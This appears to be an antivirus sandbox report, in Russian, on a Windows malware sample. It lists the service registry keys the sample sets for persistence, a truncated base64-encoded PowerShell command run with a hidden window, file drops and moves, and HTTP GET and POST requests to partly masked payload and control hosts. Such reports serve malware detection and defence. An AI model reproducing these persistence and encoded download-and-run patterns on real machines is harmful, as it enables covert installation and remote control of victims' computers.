Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\RMActivate] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\RMActivate] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDIBO\RMActivate.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEkAQQBDAEwAawBnAHQAPQAnAEcARABOAEsAWABlAHAAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBgAEkAVABgAHkAUABSAG8AVABvAGMATwBsACIAIAA9AC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\376.exe
Удаляет следующие файлы
- %HOMEPATH%\376.exe
Перемещает следующие файлы
- %HOMEPATH%\376.exe в %WINDIR%\syswow64\kbdibo\rmactivate.exe
Подменяет следующие файлы
- %HOMEPATH%\376.exe
Сетевая активность
Подключается к
- '76.##.179.47':80
TCP
Запросы HTTP GET
- http://st#####omotions.co.uk/files/0swfh_d7_3wqdwymn00/
- http://st#####omotions.co.uk/cgi-sys/suspendedpage.cgi
- http://to####andtalk.com/wp-content/d4wa_m9_8u5yii2j/
- http://fi###tones.dk/blogs/mxa61_d_ys8fqozh/
- http://lu##ybit.jp/o/e_hzu0_hlyygcbr9u/
Запросы HTTP POST
- http://76.##.179.47/SuGaaG/XkwHF/dqN7qZBBfE/
UDP
- DNS ASK ur###eden.net
- DNS ASK st#####omotions.co.uk
- DNS ASK to####andtalk.com
- DNS ASK fi###tones.dk
- DNS ASK lu##ybit.jp
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEkAQQBDAEwAawBnAHQAPQAnAEcARABOAEsAWABlAHAAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBgAEkAVABgAHkAUABSAG8AVABvAGMATwBsACIAIAA9AC...' (со скрытым окном)
